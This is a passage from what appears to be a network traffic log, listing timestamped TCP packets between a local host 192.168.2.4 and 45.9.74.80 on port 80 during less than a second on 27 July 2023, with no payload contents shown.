Jul 27, 2023 20:18:59.733292103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733299017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733324051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733339071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733372927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733381033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733406067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733417988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733448982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733460903 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733489037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733499050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733527899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733541012 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733566046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733578920 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733612061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733620882 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733645916 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733659029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733688116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733700037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733731985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733741045 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733768940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733797073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733808994 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733835936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733846903 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733874083 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733884096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733916044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733923912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733948946 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733962059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733994961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734004974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734029055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734042883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734072924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734082937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734107018 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734122038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734150887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734163046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734189034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734200954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734230995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734242916 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734265089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734278917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734308004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734322071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734343052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734358072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734394073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734405041 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734425068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734433889 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734456062 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734463930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734486103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734497070 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734519005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734525919 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734546900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734555960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734576941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734586954 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734610081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734616995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734639883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734646082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734671116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734678030 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734698057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734708071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734729052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734738111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734760046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734776020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734788895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734800100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734822989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734833956 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734853029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734862089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734884024 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734893084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734910965 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734920979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734944105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.734956980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734972954 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.734981060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735003948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735013962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735040903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735048056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735071898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735079050 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735102892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735109091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735130072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735138893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735162020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735167980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735188961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735197067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735546112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735567093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735593081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735615969 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735625982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735646009 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735660076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735668898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735688925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735698938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735718966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735728025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735748053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735760927 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735775948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735785007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735806942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735816002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735836983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735850096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735868931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735874891 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735898972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735905886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735929966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735939980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735965014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.735971928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.735992908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736010075 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736026049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736035109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736054897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736063957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736087084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736093044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736114025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736123085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736144066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736152887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736176968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736182928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736203909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736212015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736236095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736243010 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736279011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736287117 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736314058 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736323118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736345053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736361027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736386061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736392021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736413002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736422062 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736444950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736452103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736475945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736481905 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736502886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736511946 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736532927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736542940 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736562967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736572027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736594915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736602068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736628056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736634970 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736659050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736665964 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736687899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736696959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736718893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736741066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736766100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736772060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736793995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736805916 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736823082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736840963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736855030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736865044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736885071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736891985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736913919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736936092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736948013 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736967087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.736975908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.736999035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737006903 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737030983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737037897 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737059116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737067938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737088919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737097979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737121105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737128019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737150908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737157106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737178087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737186909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737210989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737217903 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737241030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737246990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737267971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737277031 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737301111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737308025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737329006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737351894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737374067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737382889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737390995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.737412930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.737443924 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.754713058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.754760027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.754786015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.754808903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.754832029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.754920006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.754981041 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.757801056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.759711027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.759735107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.759754896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.759855986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.759958029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.759980917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760000944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760020971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760040045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760057926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760078907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760080099 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760101080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760293961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760314941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760333061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760350943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760361910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760413885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760413885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760423899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760567904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760658026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760677099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760706902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760706902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760720968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760737896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760755062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760766983 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760798931 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.760967016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.760988951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761007071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761019945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761039972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761053085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761070967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761082888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761096001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761113882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761132002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761143923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761162043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761169910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761178970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761197090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761209011 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761223078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761233091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761250973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761265039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761277914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761297941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761302948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761320114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761327982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761344910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761352062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761363983 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761378050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761398077 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761410952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761429071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761447906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761455059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761461973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761477947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761496067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761513948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761521101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761528015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761545897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761554956 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761575937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761591911 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761604071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761622906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761643887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761648893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761667013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761674881 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761691093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761708975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761718035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761734962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761750937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761759996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761776924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761785984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761785984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761805058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761816978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761830091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761847973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761866093 CEST	80	49693	45.9.74.80	192.168.2.4
